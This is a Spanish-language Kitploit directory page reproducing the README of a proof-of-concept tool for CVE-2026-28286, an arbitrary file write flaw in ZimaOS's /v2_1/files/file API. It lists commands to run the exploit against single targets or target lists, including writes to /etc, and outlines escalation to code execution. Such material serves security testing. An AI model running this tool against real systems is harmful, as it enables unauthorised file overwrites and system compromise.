Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
zimaos-cve-2026-28286-arbitrary-file-write — PoC y kit de verificación para CVE-2026-28286, una vulnerabilidad de escritura arbitraria de archivos en ZimaOS, que explota una mala configuración de la API para escribir archivos fuera de los directorios previstos. | Kitploit
Herramientas/GitHubGitHub/rushi9/zimaos-cve-2026-28286-arbitrary-file-write
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Seguridad de APIsSeguridad WebPruebas de Penetración
GitHubrushi9/zimaos-cve-2026-28286-arbitrary-file-write

zimaos-cve-2026-28286-arbitrary-file-write

PoC y kit de verificación para CVE-2026-28286, una vulnerabilidad de escritura arbitraria de archivos en ZimaOS, que explota una mala configuración de la API para escribir archivos fuera de los directorios previstos.

Ver RepositorioSitio web
21hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2026-28286 — Escritura Arbitraria de Archivos en ZimaOS

De una Configuración Incorrecta de API → Escritura Arbitraria de Archivos → Posible Compromiso del Sistema

⚡ Resumen Rápido

  • Endpoint: /v2_1/files/file
  • Problema: Sin validación de rutas
  • Impacto: Escritura arbitraria de archivos fuera del directorio previsto
  • Severidad: 🔴 Crítica

🧪 Inicio Rápido

root@kitploit:~
git clone https://github.com/Rushi9/zimaos-cve-2026-28286-arbitrary-file-write.git
cd zimaos-cve-2026-28286-arbitrary-file-write
pip install -r requirements.txt
python3 poc.py

⚙️ Uso desde la Línea de Comandos

Puedes ver todas las opciones disponibles usando:

root@kitploit:~
python poc.py -h

📌 Opciones Disponibles

root@kitploit:~
usage: poc.py [-h] [-u URL] [-t TARGETS] [-p PATH] [--proxy PROXY] [--token TOKEN] [-n ATTEMPTS] [--delay DELAY]

options:
  -h, --help            show help message and exit
  -u, --url URL         Single target URL
  -t, --targets TARGETS Targets file (batch mode)
  -p, --path PATH       Custom file path (default: /tmp)
  --proxy PROXY         Proxy URL (e.g., http://127.0.0.1:8080)
  --token TOKEN         Bearer authentication token
  -n, --attempts        Number of attempts
  --delay               Delay between batch requests (seconds)

🚀 Ejemplos de Uso

▶️ 1. Modo Interactivo

root@kitploit:~
python poc.py

▶️ 2. Objetivo Único

root@kitploit:~
python poc.py -u http://localhost:8080

▶️ 3. Ruta Personalizada

root@kitploit:~
python poc.py -u http://localhost:8080 -p /tmp

▶️ 4. Apuntar a una Ruta Sensible (Pruebas de Laboratorio)

root@kitploit:~
python poc.py -u http://localhost:8080 -p /etc

▶️ 5. Múltiples Intentos

root@kitploit:~
python poc.py -u http://localhost:8080 -n 5

▶️ 6. Usando Proxy (Burp Suite)

root@kitploit:~
python poc.py -u http://localhost:8080 --proxy http://127.0.0.1:8080

▶️ 7. Modo Lote

root@kitploit:~
python poc.py -t targets.txt

▶️ 8. Modo Lote con Retardo

root@kitploit:~
python poc.py -t targets.txt --delay 2

▶️ 9. Modo de Potencia Total (Todas las Opciones)

root@kitploit:~
python poc.py -u http://target.com -p /tmp -n 3 --proxy http://127.0.0.1:8080 --token YOUR_TOKEN

💡 Consejo

Usa el modo proxy con Burp Suite para:

  • Inspeccionar solicitudes
  • Modificar payloads
  • Confirmar el comportamiento del backend

🧠 Desglose Técnico

El backend no aplica límites del sistema de archivos:

  • ❌ Sin canonicalización de rutas
  • ❌ Sin restricción del directorio base
  • ❌ Rutas absolutas controladas por el usuario

Esto permite escribir en:

root@kitploit:~
/tmp/
/etc/
/usr/local/bin/

💥 Impacto

root@kitploit:~
Escritura Arbitraria de Archivos
        ↓
Sobrescribir Configuración / Scripts
        ↓
Escalada de Privilegios / RCE


🎥 Demo

image

📁 Ejemplo de Salida

root@kitploit:~
[✔] CONFIRMED vulnerable (LISTING_SUCCESS)
Path: /tmp/CVE-2026-28286_⚠️_abc123.txt

⭐ Soporte

Si te resultó útil, considera dar una estrella ⭐ Ayuda a que más investigadores descubran este trabajo.


⚠️ Aviso Legal

Solo para pruebas autorizadas.

Descargar herramienta